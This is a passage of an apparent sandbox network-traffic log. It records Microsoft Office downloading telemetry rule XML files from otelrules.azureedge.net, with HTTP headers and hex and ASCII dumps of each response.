                                                                    2024-10-28 13:03:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    114192.168.2.44986913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:35 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:35 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:35 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1395
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                    ETag: "0x8DC582BDE12A98D"
                                                                    x-ms-request-id: 8f4dae4f-901e-008f-19cb-2767a6000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130335Z-17c5cb586f6fqqst87nqkbsx1c00000003fg000000005qv0
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    115192.168.2.44987013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:35 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:35 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:35 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1358
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                    ETag: "0x8DC582BE022ECC5"
                                                                    x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130335Z-16849878b78q9m8bqvwuva4svc00000003h000000000eabu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    116192.168.2.44987113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:36 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:36 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1389
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                    ETag: "0x8DC582BE10A6BC1"
                                                                    x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130336Z-16849878b786jv8w2kpaf5zkqs00000003w000000000ewc4
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:36 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    117192.168.2.44987313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:36 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:36 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1405
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                    ETag: "0x8DC582BE12B5C71"
                                                                    x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130336Z-16849878b78qwx7pmw9x5fub1c000000035g00000000dcf5
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:36 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    118192.168.2.44987213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:36 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:36 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1352
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                    ETag: "0x8DC582BE9DEEE28"
                                                                    x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130336Z-16849878b7867ttgfbpnfxt44s00000004u000000000kqqv
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:36 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    119192.168.2.44987413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:36 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:36 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1368
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                    ETag: "0x8DC582BDDC22447"
                                                                    x-ms-request-id: df5d8003-e01e-0099-48f7-26da8a000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130336Z-r197bdfb6b4zd9tpkpdngrtchw00000004bg000000005dc6
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:36 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    120192.168.2.44987513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:36 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:36 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1401
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                    ETag: "0x8DC582BE055B528"
                                                                    x-ms-request-id: 04bfc9b2-001e-0017-54ad-260c3c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130336Z-16849878b78smng4k6nq15r6s400000006ng000000005a53
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:36 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    121192.168.2.44987613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:37 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:37 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:37 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1364
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                    ETag: "0x8DC582BE1223606"
                                                                    x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130337Z-16849878b78tg5n42kspfr0x48000000050g00000000e1x4
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:37 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    122192.168.2.44987713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:37 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:37 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:37 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1397
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                    ETag: "0x8DC582BE7262739"
                                                                    x-ms-request-id: f0c9e92d-201e-0000-1199-25a537000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130337Z-16849878b786fl7gm2qg4r5y7000000005bg000000008xsh
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:37 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    123192.168.2.44987813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:37 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:37 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:37 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1360
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                    ETag: "0x8DC582BDDEB5124"
                                                                    x-ms-request-id: 4f1f6d30-a01e-0070-1ae8-27573b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130337Z-15b8d89586fcvr6p5956n5d0rc0000000azg000000004nct
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
